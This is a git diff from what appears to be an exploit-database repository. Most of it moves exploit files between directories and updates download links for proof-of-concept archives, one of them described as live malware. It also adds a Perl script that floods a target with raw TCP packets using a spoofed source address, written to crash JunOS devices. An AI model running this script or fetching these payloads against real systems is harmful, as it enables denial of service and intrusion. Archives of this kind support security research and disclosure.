similarity index 100% rename from platforms/multiple/local/19912.txt rename to exploits/multiple/local/19912.txt diff --git a/platforms/multiple/local/19967.txt b/exploits/multiple/local/19967.txt similarity index 100% rename from platforms/multiple/local/19967.txt rename to exploits/multiple/local/19967.txt diff --git a/platforms/multiple/local/19999.txt b/exploits/multiple/local/19999.txt similarity index 100% rename from platforms/multiple/local/19999.txt rename to exploits/multiple/local/19999.txt diff --git a/platforms/multiple/local/20274.pl b/exploits/multiple/local/20274.pl similarity index 100% rename from platforms/multiple/local/20274.pl rename to exploits/multiple/local/20274.pl diff --git a/platforms/multiple/local/21020.c b/exploits/multiple/local/21020.c similarity index 100% rename from platforms/multiple/local/21020.c rename to exploits/multiple/local/21020.c diff --git a/platforms/multiple/local/21078.txt b/exploits/multiple/local/21078.txt similarity index 100% rename from platforms/multiple/local/21078.txt rename to exploits/multiple/local/21078.txt diff --git a/platforms/multiple/local/21117.txt b/exploits/multiple/local/21117.txt similarity index 93% rename from platforms/multiple/local/21117.txt rename to exploits/multiple/local/21117.txt index 09c77da19..a1a13cf45 100644 --- a/platforms/multiple/local/21117.txt +++ b/exploits/multiple/local/21117.txt @@ -8,4 +8,4 @@ These problems could be exploited to allow a local attacker to execute arbitrary This situation could be leveraged by the attacker to gain root privileges on the host. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21117.tar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21117.tar \ No newline at end of file diff --git a/platforms/multiple/local/21283.txt b/exploits/multiple/local/21283.txt similarity index 100% rename from platforms/multiple/local/21283.txt rename to exploits/multiple/local/21283.txt diff --git a/platforms/multiple/local/21288.txt b/exploits/multiple/local/21288.txt similarity index 100% rename from platforms/multiple/local/21288.txt rename to exploits/multiple/local/21288.txt diff --git a/platforms/multiple/local/21359.c b/exploits/multiple/local/21359.c similarity index 100% rename from platforms/multiple/local/21359.c rename to exploits/multiple/local/21359.c diff --git a/platforms/multiple/local/21856.txt b/exploits/multiple/local/21856.txt similarity index 100% rename from platforms/multiple/local/21856.txt rename to exploits/multiple/local/21856.txt diff --git a/platforms/multiple/local/22069.py b/exploits/multiple/local/22069.py similarity index 100% rename from platforms/multiple/local/22069.py rename to exploits/multiple/local/22069.py diff --git a/platforms/multiple/local/22272.pl b/exploits/multiple/local/22272.pl similarity index 100% rename from platforms/multiple/local/22272.pl rename to exploits/multiple/local/22272.pl diff --git a/platforms/multiple/local/22628.sh b/exploits/multiple/local/22628.sh similarity index 100% rename from platforms/multiple/local/22628.sh rename to exploits/multiple/local/22628.sh diff --git a/platforms/multiple/local/22727.pl b/exploits/multiple/local/22727.pl similarity index 100% rename from platforms/multiple/local/22727.pl rename to exploits/multiple/local/22727.pl diff --git a/platforms/multiple/local/22732.java b/exploits/multiple/local/22732.java similarity index 100% rename from platforms/multiple/local/22732.java rename to exploits/multiple/local/22732.java diff --git a/platforms/multiple/local/23611.pl b/exploits/multiple/local/23611.pl similarity index 100% rename from platforms/multiple/local/23611.pl rename to exploits/multiple/local/23611.pl diff --git a/platforms/multiple/local/24923.txt b/exploits/multiple/local/24923.txt similarity index 100% rename from platforms/multiple/local/24923.txt rename to exploits/multiple/local/24923.txt diff --git a/platforms/multiple/local/28655.rb b/exploits/multiple/local/28655.rb similarity index 100% rename from platforms/multiple/local/28655.rb rename to exploits/multiple/local/28655.rb diff --git a/platforms/multiple/local/288.c b/exploits/multiple/local/288.c similarity index 100% rename from platforms/multiple/local/288.c rename to exploits/multiple/local/288.c diff --git a/platforms/multiple/local/28817.txt b/exploits/multiple/local/28817.txt similarity index 91% rename from platforms/multiple/local/28817.txt rename to exploits/multiple/local/28817.txt index a7706da05..ed8898c87 100644 --- a/platforms/multiple/local/28817.txt +++ b/exploits/multiple/local/28817.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to delete arbitrary files within the context Versions 3.6.cpu, 3.6.cpj are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28817.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28817.zip \ No newline at end of file diff --git a/platforms/multiple/local/30039.txt b/exploits/multiple/local/30039.txt similarity index 90% rename from platforms/multiple/local/30039.txt rename to exploits/multiple/local/30039.txt index f157dafe6..efc7df96a 100644 --- a/platforms/multiple/local/30039.txt +++ b/exploits/multiple/local/30039.txt @@ -11,6 +11,6 @@ The following applications are vulnerable to this issue: Other applications and versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30039-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30039-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30039-2.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30039-2.zip \ No newline at end of file diff --git a/platforms/multiple/local/30183.txt b/exploits/multiple/local/30183.txt similarity index 100% rename from platforms/multiple/local/30183.txt rename to exploits/multiple/local/30183.txt diff --git a/platforms/multiple/local/30295.sql b/exploits/multiple/local/30295.sql similarity index 100% rename from platforms/multiple/local/30295.sql rename to exploits/multiple/local/30295.sql diff --git a/platforms/multiple/local/30474.rb b/exploits/multiple/local/30474.rb similarity index 100% rename from platforms/multiple/local/30474.rb rename to exploits/multiple/local/30474.rb diff --git a/platforms/multiple/local/30666.txt b/exploits/multiple/local/30666.txt similarity index 100% rename from platforms/multiple/local/30666.txt rename to exploits/multiple/local/30666.txt diff --git a/platforms/multiple/local/30970.txt b/exploits/multiple/local/30970.txt similarity index 89% rename from platforms/multiple/local/30970.txt rename to exploits/multiple/local/30970.txt index 0ada8b43e..5eae9d859 100644 --- a/platforms/multiple/local/30970.txt +++ b/exploits/multiple/local/30970.txt @@ -6,4 +6,4 @@ Exploiting these issues can allow local attackers to execute arbitrary code in t Versions prior to White_Dune 0.29beta795 are affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30970.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30970.zip \ No newline at end of file diff --git a/platforms/multiple/local/3177.txt b/exploits/multiple/local/3177.txt similarity index 100% rename from platforms/multiple/local/3177.txt rename to exploits/multiple/local/3177.txt diff --git a/platforms/multiple/local/3178.txt b/exploits/multiple/local/3178.txt similarity index 100% rename from platforms/multiple/local/3178.txt rename to exploits/multiple/local/3178.txt diff --git a/platforms/multiple/local/3179.txt b/exploits/multiple/local/3179.txt similarity index 100% rename from platforms/multiple/local/3179.txt rename to exploits/multiple/local/3179.txt diff --git a/platforms/multiple/local/32055.txt b/exploits/multiple/local/32055.txt similarity index 91% rename from platforms/multiple/local/32055.txt rename to exploits/multiple/local/32055.txt index 0193941a4..a601d46e7 100644 --- a/platforms/multiple/local/32055.txt +++ b/exploits/multiple/local/32055.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue can allow an attacker to execute arbitrary co Netrw 127 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32055.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32055.zip \ No newline at end of file diff --git a/platforms/multiple/local/321.c b/exploits/multiple/local/321.c similarity index 100% rename from platforms/multiple/local/321.c rename to exploits/multiple/local/321.c diff --git a/platforms/multiple/local/32501.txt b/exploits/multiple/local/32501.txt similarity index 94% rename from platforms/multiple/local/32501.txt rename to exploits/multiple/local/32501.txt index b552c7bdc..f01112f6f 100644 --- a/platforms/multiple/local/32501.txt +++ b/exploits/multiple/local/32501.txt @@ -12,4 +12,4 @@ MIFARE Classic is prone to multiple security weaknesses: Exploiting these issues in combination may allow attackers to gain access to the smartcard's secret key. Successful exploits will allow attackers with physical access to an RFID reader to bypass certain physical security restrictions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32501.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32501.tgz \ No newline at end of file diff --git a/platforms/multiple/local/32847.txt b/exploits/multiple/local/32847.txt similarity index 100% rename from platforms/multiple/local/32847.txt rename to exploits/multiple/local/32847.txt diff --git a/platforms/multiple/local/3413.php b/exploits/multiple/local/3413.php similarity index 100% rename from platforms/multiple/local/3413.php rename to exploits/multiple/local/3413.php diff --git a/platforms/multiple/local/3414.php b/exploits/multiple/local/3414.php similarity index 100% rename from platforms/multiple/local/3414.php rename to exploits/multiple/local/3414.php diff --git a/platforms/multiple/local/3424.php b/exploits/multiple/local/3424.php similarity index 100% rename from platforms/multiple/local/3424.php rename to exploits/multiple/local/3424.php diff --git a/platforms/multiple/local/3442.php b/exploits/multiple/local/3442.php similarity index 100% rename from platforms/multiple/local/3442.php rename to exploits/multiple/local/3442.php diff --git a/platforms/multiple/local/3559.php b/exploits/multiple/local/3559.php similarity index 100% rename from platforms/multiple/local/3559.php rename to exploits/multiple/local/3559.php diff --git a/platforms/multiple/local/35732.py b/exploits/multiple/local/35732.py similarity index 100% rename from platforms/multiple/local/35732.py rename to exploits/multiple/local/35732.py diff --git a/platforms/multiple/local/37772.js b/exploits/multiple/local/37772.js similarity index 100% rename from platforms/multiple/local/37772.js rename to exploits/multiple/local/37772.js diff --git a/platforms/multiple/local/38447.pl b/exploits/multiple/local/38447.pl similarity index 100% rename from platforms/multiple/local/38447.pl rename to exploits/multiple/local/38447.pl diff --git a/platforms/multiple/local/38835.py b/exploits/multiple/local/38835.py similarity index 100% rename from platforms/multiple/local/38835.py rename to exploits/multiple/local/38835.py diff --git a/platforms/multiple/local/39595.txt b/exploits/multiple/local/39595.txt similarity index 96% rename from platforms/multiple/local/39595.txt rename to exploits/multiple/local/39595.txt index d6481665f..35d920b1b 100644 --- a/platforms/multiple/local/39595.txt +++ b/exploits/multiple/local/39595.txt @@ -104,4 +104,4 @@ Note that the race window is still quite tight so you may have to try a few time Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39595.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39595.zip \ No newline at end of file diff --git a/platforms/multiple/local/39656.py b/exploits/multiple/local/39656.py similarity index 100% rename from platforms/multiple/local/39656.py rename to exploits/multiple/local/39656.py diff --git a/platforms/multiple/local/39791.rb b/exploits/multiple/local/39791.rb similarity index 100% rename from platforms/multiple/local/39791.rb rename to exploits/multiple/local/39791.rb diff --git a/platforms/multiple/local/40164.c b/exploits/multiple/local/40164.c similarity index 100% rename from platforms/multiple/local/40164.c rename to exploits/multiple/local/40164.c diff --git a/platforms/multiple/local/40440.py b/exploits/multiple/local/40440.py similarity index 100% rename from platforms/multiple/local/40440.py rename to exploits/multiple/local/40440.py diff --git a/platforms/multiple/local/40588.txt b/exploits/multiple/local/40588.txt similarity index 100% rename from platforms/multiple/local/40588.txt rename to exploits/multiple/local/40588.txt diff --git a/platforms/multiple/local/40686.txt b/exploits/multiple/local/40686.txt similarity index 100% rename from platforms/multiple/local/40686.txt rename to exploits/multiple/local/40686.txt diff --git a/platforms/multiple/local/40931.txt b/exploits/multiple/local/40931.txt similarity index 98% rename from platforms/multiple/local/40931.txt rename to exploits/multiple/local/40931.txt index b1797e77a..8579cf53f 100644 --- a/platforms/multiple/local/40931.txt +++ b/exploits/multiple/local/40931.txt @@ -576,4 +576,4 @@ Shell: Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40931.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40931.zip \ No newline at end of file diff --git a/platforms/multiple/local/41021.txt b/exploits/multiple/local/41021.txt similarity index 98% rename from platforms/multiple/local/41021.txt rename to exploits/multiple/local/41021.txt index bff90af94..18a3cd843 100644 --- a/platforms/multiple/local/41021.txt +++ b/exploits/multiple/local/41021.txt @@ -1,5 +1,5 @@ For those who only care about one thing: [the PoC is here.](https://rol.im/kpwned.zip) -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41021.zip +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41021.zip ## Overview diff --git a/platforms/multiple/local/41683.rb b/exploits/multiple/local/41683.rb similarity index 100% rename from platforms/multiple/local/41683.rb rename to exploits/multiple/local/41683.rb diff --git a/platforms/multiple/local/41804.c b/exploits/multiple/local/41804.c similarity index 100% rename from platforms/multiple/local/41804.c rename to exploits/multiple/local/41804.c diff --git a/platforms/multiple/local/41870.txt b/exploits/multiple/local/41870.txt similarity index 97% rename from platforms/multiple/local/41870.txt rename to exploits/multiple/local/41870.txt index 4eeb6353c..6d15a7188 100644 --- a/platforms/multiple/local/41870.txt +++ b/exploits/multiple/local/41870.txt @@ -218,4 +218,4 @@ Proof of Concept: privesc_poc.tar.gz ################################################################################ Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41870.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41870.zip \ No newline at end of file diff --git a/platforms/multiple/local/41904.txt b/exploits/multiple/local/41904.txt similarity index 97% rename from platforms/multiple/local/41904.txt rename to exploits/multiple/local/41904.txt index 637c672d9..582d86543 100644 --- a/platforms/multiple/local/41904.txt +++ b/exploits/multiple/local/41904.txt @@ -315,4 +315,4 @@ the VM to restore network connectivity. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41904.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41904.zip \ No newline at end of file diff --git a/platforms/multiple/local/4203.sql b/exploits/multiple/local/4203.sql similarity index 100% rename from platforms/multiple/local/4203.sql rename to exploits/multiple/local/4203.sql diff --git a/platforms/multiple/local/42145.c b/exploits/multiple/local/42145.c similarity index 100% rename from platforms/multiple/local/42145.c rename to exploits/multiple/local/42145.c diff --git a/platforms/multiple/local/42407.txt b/exploits/multiple/local/42407.txt similarity index 97% rename from platforms/multiple/local/42407.txt rename to exploits/multiple/local/42407.txt index 6b0993a41..1c728758b 100644 --- a/platforms/multiple/local/42407.txt +++ b/exploits/multiple/local/42407.txt @@ -77,4 +77,4 @@ The exploit isn't hugely reliable - the race condition needs quite exact timing Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42407.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42407.zip \ No newline at end of file diff --git a/platforms/multiple/local/4392.txt b/exploits/multiple/local/4392.txt similarity index 100% rename from platforms/multiple/local/4392.txt rename to exploits/multiple/local/4392.txt diff --git a/platforms/multiple/local/4564.txt b/exploits/multiple/local/4564.txt similarity index 100% rename from platforms/multiple/local/4564.txt rename to exploits/multiple/local/4564.txt diff --git a/platforms/multiple/local/4570.pl b/exploits/multiple/local/4570.pl similarity index 100% rename from platforms/multiple/local/4570.pl rename to exploits/multiple/local/4570.pl diff --git a/platforms/multiple/local/4571.pl b/exploits/multiple/local/4571.pl similarity index 100% rename from platforms/multiple/local/4571.pl rename to exploits/multiple/local/4571.pl diff --git a/platforms/multiple/local/4572.txt b/exploits/multiple/local/4572.txt similarity index 100% rename from platforms/multiple/local/4572.txt rename to exploits/multiple/local/4572.txt diff --git a/platforms/multiple/local/4994.sql b/exploits/multiple/local/4994.sql similarity index 100% rename from platforms/multiple/local/4994.sql rename to exploits/multiple/local/4994.sql diff --git a/platforms/multiple/local/4995.sql b/exploits/multiple/local/4995.sql similarity index 100% rename from platforms/multiple/local/4995.sql rename to exploits/multiple/local/4995.sql diff --git a/platforms/multiple/local/4996.sql b/exploits/multiple/local/4996.sql similarity index 100% rename from platforms/multiple/local/4996.sql rename to exploits/multiple/local/4996.sql diff --git a/platforms/multiple/local/629.c b/exploits/multiple/local/629.c similarity index 100% rename from platforms/multiple/local/629.c rename to exploits/multiple/local/629.c diff --git a/platforms/multiple/local/7129.sh b/exploits/multiple/local/7129.sh similarity index 100% rename from platforms/multiple/local/7129.sh rename to exploits/multiple/local/7129.sh diff --git a/platforms/multiple/local/7171.txt b/exploits/multiple/local/7171.txt similarity index 100% rename from platforms/multiple/local/7171.txt rename to exploits/multiple/local/7171.txt diff --git a/platforms/multiple/local/7503.txt b/exploits/multiple/local/7503.txt similarity index 100% rename from platforms/multiple/local/7503.txt rename to exploits/multiple/local/7503.txt diff --git a/platforms/multiple/local/7550.c b/exploits/multiple/local/7550.c similarity index 100% rename from platforms/multiple/local/7550.c rename to exploits/multiple/local/7550.c diff --git a/platforms/multiple/local/7646.txt b/exploits/multiple/local/7646.txt similarity index 100% rename from platforms/multiple/local/7646.txt rename to exploits/multiple/local/7646.txt diff --git a/platforms/multiple/local/7675.txt b/exploits/multiple/local/7675.txt similarity index 100% rename from platforms/multiple/local/7675.txt rename to exploits/multiple/local/7675.txt diff --git a/platforms/multiple/local/7676.txt b/exploits/multiple/local/7676.txt similarity index 100% rename from platforms/multiple/local/7676.txt rename to exploits/multiple/local/7676.txt diff --git a/platforms/multiple/local/7677.txt b/exploits/multiple/local/7677.txt similarity index 100% rename from platforms/multiple/local/7677.txt rename to exploits/multiple/local/7677.txt diff --git a/platforms/multiple/local/8067.txt b/exploits/multiple/local/8067.txt similarity index 100% rename from platforms/multiple/local/8067.txt rename to exploits/multiple/local/8067.txt diff --git a/platforms/multiple/local/8074.rb b/exploits/multiple/local/8074.rb similarity index 100% rename from platforms/multiple/local/8074.rb rename to exploits/multiple/local/8074.rb diff --git a/platforms/multiple/local/8456.txt b/exploits/multiple/local/8456.txt similarity index 100% rename from platforms/multiple/local/8456.txt rename to exploits/multiple/local/8456.txt diff --git a/platforms/multiple/local/8641.txt b/exploits/multiple/local/8641.txt similarity index 100% rename from platforms/multiple/local/8641.txt rename to exploits/multiple/local/8641.txt diff --git a/platforms/multiple/local/9072.txt b/exploits/multiple/local/9072.txt similarity index 100% rename from platforms/multiple/local/9072.txt rename to exploits/multiple/local/9072.txt diff --git a/platforms/multiple/local/9097.txt b/exploits/multiple/local/9097.txt similarity index 100% rename from platforms/multiple/local/9097.txt rename to exploits/multiple/local/9097.txt diff --git a/platforms/multiple/local/9489.txt b/exploits/multiple/local/9489.txt similarity index 100% rename from platforms/multiple/local/9489.txt rename to exploits/multiple/local/9489.txt diff --git a/platforms/multiple/local/9520.txt b/exploits/multiple/local/9520.txt similarity index 100% rename from platforms/multiple/local/9520.txt rename to exploits/multiple/local/9520.txt diff --git a/platforms/multiple/local/9973.sh b/exploits/multiple/local/9973.sh similarity index 100% rename from platforms/multiple/local/9973.sh rename to exploits/multiple/local/9973.sh diff --git a/platforms/multiple/local/9985.txt b/exploits/multiple/local/9985.txt similarity index 100% rename from platforms/multiple/local/9985.txt rename to exploits/multiple/local/9985.txt diff --git a/platforms/multiple/local/9990.txt b/exploits/multiple/local/9990.txt similarity index 100% rename from platforms/multiple/local/9990.txt rename to exploits/multiple/local/9990.txt diff --git a/platforms/multiple/remote/10.c b/exploits/multiple/remote/10.c similarity index 100% rename from platforms/multiple/remote/10.c rename to exploits/multiple/remote/10.c diff --git a/platforms/multiple/remote/10001.txt b/exploits/multiple/remote/10001.txt similarity index 100% rename from platforms/multiple/remote/10001.txt rename to exploits/multiple/remote/10001.txt diff --git a/platforms/multiple/remote/1007.html b/exploits/multiple/remote/1007.html similarity index 100% rename from platforms/multiple/remote/1007.html rename to exploits/multiple/remote/1007.html diff --git a/platforms/multiple/remote/10071.txt b/exploits/multiple/remote/10071.txt similarity index 100% rename from platforms/multiple/remote/10071.txt rename to exploits/multiple/remote/10071.txt diff --git a/platforms/multiple/remote/10086.txt b/exploits/multiple/remote/10086.txt similarity index 100% rename from platforms/multiple/remote/10086.txt rename to exploits/multiple/remote/10086.txt diff --git a/platforms/multiple/remote/10093.txt b/exploits/multiple/remote/10093.txt similarity index 100% rename from platforms/multiple/remote/10093.txt rename to exploits/multiple/remote/10093.txt diff --git a/platforms/multiple/remote/10095.txt b/exploits/multiple/remote/10095.txt similarity index 100% rename from platforms/multiple/remote/10095.txt rename to exploits/multiple/remote/10095.txt diff --git a/platforms/multiple/remote/10579.py b/exploits/multiple/remote/10579.py similarity index 100% rename from platforms/multiple/remote/10579.py rename to exploits/multiple/remote/10579.py diff --git a/platforms/multiple/remote/1114.c b/exploits/multiple/remote/1114.c similarity index 100% rename from platforms/multiple/remote/1114.c rename to exploits/multiple/remote/1114.c diff --git a/platforms/multiple/remote/11203.py b/exploits/multiple/remote/11203.py similarity index 100% rename from platforms/multiple/remote/11203.py rename to exploits/multiple/remote/11203.py diff --git a/platforms/multiple/remote/11662.txt b/exploits/multiple/remote/11662.txt similarity index 100% rename from platforms/multiple/remote/11662.txt rename to exploits/multiple/remote/11662.txt diff --git a/platforms/multiple/remote/11817.txt b/exploits/multiple/remote/11817.txt similarity index 100% rename from platforms/multiple/remote/11817.txt rename to exploits/multiple/remote/11817.txt diff --git a/platforms/multiple/remote/11856.txt b/exploits/multiple/remote/11856.txt similarity index 100% rename from platforms/multiple/remote/11856.txt rename to exploits/multiple/remote/11856.txt diff --git a/platforms/multiple/remote/1188.c b/exploits/multiple/remote/1188.c similarity index 100% rename from platforms/multiple/remote/1188.c rename to exploits/multiple/remote/1188.c diff --git a/platforms/multiple/remote/12033.txt b/exploits/multiple/remote/12033.txt similarity index 100% rename from platforms/multiple/remote/12033.txt rename to exploits/multiple/remote/12033.txt diff --git a/platforms/multiple/remote/12114.txt b/exploits/multiple/remote/12114.txt similarity index 100% rename from platforms/multiple/remote/12114.txt rename to exploits/multiple/remote/12114.txt diff --git a/platforms/multiple/remote/12122.txt b/exploits/multiple/remote/12122.txt similarity index 100% rename from platforms/multiple/remote/12122.txt rename to exploits/multiple/remote/12122.txt diff --git a/platforms/multiple/remote/12263.txt b/exploits/multiple/remote/12263.txt similarity index 100% rename from platforms/multiple/remote/12263.txt rename to exploits/multiple/remote/12263.txt diff --git a/platforms/multiple/remote/12264.txt b/exploits/multiple/remote/12264.txt similarity index 100% rename from platforms/multiple/remote/12264.txt rename to exploits/multiple/remote/12264.txt diff --git a/platforms/multiple/remote/12304.txt b/exploits/multiple/remote/12304.txt similarity index 100% rename from platforms/multiple/remote/12304.txt rename to exploits/multiple/remote/12304.txt diff --git a/platforms/multiple/remote/12343.txt b/exploits/multiple/remote/12343.txt similarity index 100% rename from platforms/multiple/remote/12343.txt rename to exploits/multiple/remote/12343.txt diff --git a/platforms/multiple/remote/1263.pl b/exploits/multiple/remote/1263.pl similarity index 100% rename from platforms/multiple/remote/1263.pl rename to exploits/multiple/remote/1263.pl diff --git a/platforms/multiple/remote/12804.txt b/exploits/multiple/remote/12804.txt similarity index 100% rename from platforms/multiple/remote/12804.txt rename to exploits/multiple/remote/12804.txt diff --git a/platforms/multiple/remote/1292.pm b/exploits/multiple/remote/1292.pm similarity index 100% rename from platforms/multiple/remote/1292.pm rename to exploits/multiple/remote/1292.pm diff --git a/exploits/multiple/remote/13588.pl b/exploits/multiple/remote/13588.pl new file mode 100755 index 000000000..399020907 --- /dev/null +++ b/exploits/multiple/remote/13588.pl @@ -0,0 +1,61 @@ +#!/usr/bin/perl +# +# 2^6 TCP Control Bit Fuzzer (No ECN or CWR) +# +# This code was written originally as a control bit fuzzer for the JunOS 3-9 crash mentioned +# in PSN-2010-01-623 and http://www.securityfocus.com/news/11571 +# However it will also be useful in fuzzing future IP stacks, such as userland IP stacks or +# embedded systems. +# +# Originally it was was going to be the full 2^8, however Net::RawIP does't support the ECE +# or the CWR bit, so I've got a Metasploit auxillery in the works to cover the full 2^8. +# +# I've left the ece/cwr portions commented out, so if in the future Net::RawIP supports these bits, +# all you need to do is uncomment them and change the 65 in the for loop to a 256. +# +# Written by Shadow, 1/08/2010 +# ShadowHatesYou @ irc.freenode.net #remote-exploit + +use Net::RawIP; + +# Set the packet's payload. Shellcode could go here.... +my $data = "Die!"; + +if ($ARGV[1] eq '') { print "Usage: ./" . $0 . " \n"; exit(0); } +if ($ARGV[2] eq '') { my $src_ip = "72.52.4.181" } else { my $src_ip = $ARGV[2]; } + +my $packet = new Net::RawIP({tcp=>{}}); +$packet->set({ + ip => { + saddr => $src_ip, + daddr => $ARGV[0], + id => 666 + } +}); +# Build packet $i with TCP control options $i +for (my $i=0; $i < 64; $i++) { + my $packet = new Net::RawIP({tcp=>{}}); + # Get our options + my $binary = sprintf("%b", $i); + my @bits = split(//, $binary); + # Set the source and destination IP + $packet->set({ + tcp => { + source => $ARGV[1], + dest => $ARGV[1], + data => $data, + syn => @bits[0], + ack => @bits[1], + fin => @bits[2], + rst => @bits[3], + psh => @bits[4], + urg => @bits[5], +# cwr => @bits[6], +# ece => @bits[7] + } + }); + # Packets away. + print "Sending packet " . ($i + 1) . " to " . $ARGV[0] . ":" .$ARGV[1] . " Bits: bits\n"; + $packet->send; +} +exit(0); \ No newline at end of file diff --git a/platforms/multiple/remote/1369.html b/exploits/multiple/remote/1369.html similarity index 100% rename from platforms/multiple/remote/1369.html rename to exploits/multiple/remote/1369.html diff --git a/platforms/multiple/remote/13787.txt b/exploits/multiple/remote/13787.txt similarity index 86% rename from platforms/multiple/remote/13787.txt rename to exploits/multiple/remote/13787.txt index a98bd3c52..b0f32af3e 100644 --- a/platforms/multiple/remote/13787.txt +++ b/exploits/multiple/remote/13787.txt @@ -9,4 +9,4 @@ NOTE: This was taken out of live malware and was not modified. BEWARE. By visiting the following link, you agree that you are responsible for any damages that occur. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc) \ No newline at end of file diff --git a/platforms/multiple/remote/13850.pl b/exploits/multiple/remote/13850.pl similarity index 100% rename from platforms/multiple/remote/13850.pl rename to exploits/multiple/remote/13850.pl diff --git a/platforms/multiple/remote/14360.txt b/exploits/multiple/remote/14360.txt similarity index 100% rename from platforms/multiple/remote/14360.txt rename to exploits/multiple/remote/14360.txt diff --git a/platforms/multiple/remote/14386.html b/exploits/multiple/remote/14386.html similarity index 100% rename from platforms/multiple/remote/14386.html rename to exploits/multiple/remote/14386.html diff --git a/platforms/multiple/remote/14387.html b/exploits/multiple/remote/14387.html similarity index 100% rename from platforms/multiple/remote/14387.html rename to exploits/multiple/remote/14387.html diff --git a/platforms/multiple/remote/14388.html b/exploits/multiple/remote/14388.html similarity index 100% rename from platforms/multiple/remote/14388.html rename to exploits/multiple/remote/14388.html diff --git a/platforms/multiple/remote/14602.txt b/exploits/multiple/remote/14602.txt similarity index 100% rename from platforms/multiple/remote/14602.txt rename to exploits/multiple/remote/14602.txt diff --git a/platforms/multiple/remote/14641.py b/exploits/multiple/remote/14641.py similarity index 100% rename from platforms/multiple/remote/14641.py rename to exploits/multiple/remote/14641.py diff --git a/platforms/multiple/remote/14875.txt b/exploits/multiple/remote/14875.txt similarity index 100% rename from platforms/multiple/remote/14875.txt rename to exploits/multiple/remote/14875.txt diff --git a/platforms/multiple/remote/15005.txt b/exploits/multiple/remote/15005.txt similarity index 100% rename from platforms/multiple/remote/15005.txt rename to exploits/multiple/remote/15005.txt diff --git a/platforms/multiple/remote/15298.txt b/exploits/multiple/remote/15298.txt similarity index 100% rename from platforms/multiple/remote/15298.txt rename to exploits/multiple/remote/15298.txt diff --git a/platforms/multiple/remote/15617.txt b/exploits/multiple/remote/15617.txt similarity index 100% rename from platforms/multiple/remote/15617.txt rename to exploits/multiple/remote/15617.txt diff --git a/platforms/multiple/remote/15717.txt b/exploits/multiple/remote/15717.txt similarity index 100% rename from platforms/multiple/remote/15717.txt rename to exploits/multiple/remote/15717.txt diff --git a/platforms/multiple/remote/15937.pl b/exploits/multiple/remote/15937.pl similarity index 100% rename from platforms/multiple/remote/15937.pl rename to exploits/multiple/remote/15937.pl diff --git a/platforms/multiple/remote/1602.c b/exploits/multiple/remote/1602.c similarity index 100% rename from platforms/multiple/remote/1602.c rename to exploits/multiple/remote/1602.c diff --git a/platforms/multiple/remote/16041.txt b/exploits/multiple/remote/16041.txt similarity index 100% rename from platforms/multiple/remote/16041.txt rename to exploits/multiple/remote/16041.txt diff --git a/platforms/multiple/remote/16103.txt b/exploits/multiple/remote/16103.txt similarity index 100% rename from platforms/multiple/remote/16103.txt rename to exploits/multiple/remote/16103.txt diff --git a/platforms/multiple/remote/16137.c b/exploits/multiple/remote/16137.c similarity index 100% rename from platforms/multiple/remote/16137.c rename to exploits/multiple/remote/16137.c diff --git a/platforms/multiple/remote/16286.rb b/exploits/multiple/remote/16286.rb similarity index 100% rename from platforms/multiple/remote/16286.rb rename to exploits/multiple/remote/16286.rb diff --git a/platforms/multiple/remote/16291.rb b/exploits/multiple/remote/16291.rb similarity index 100% rename from platforms/multiple/remote/16291.rb rename to exploits/multiple/remote/16291.rb diff --git a/platforms/multiple/remote/16292.rb b/exploits/multiple/remote/16292.rb similarity index 100% rename from platforms/multiple/remote/16292.rb rename to exploits/multiple/remote/16292.rb diff --git a/platforms/multiple/remote/16293.rb b/exploits/multiple/remote/16293.rb similarity index 100% rename from platforms/multiple/remote/16293.rb rename to exploits/multiple/remote/16293.rb diff --git a/platforms/multiple/remote/16294.rb b/exploits/multiple/remote/16294.rb similarity index 100% rename from platforms/multiple/remote/16294.rb rename to exploits/multiple/remote/16294.rb diff --git a/platforms/multiple/remote/16295.rb b/exploits/multiple/remote/16295.rb similarity index 100% rename from platforms/multiple/remote/16295.rb rename to exploits/multiple/remote/16295.rb diff --git a/platforms/multiple/remote/16297.rb b/exploits/multiple/remote/16297.rb similarity index 100% 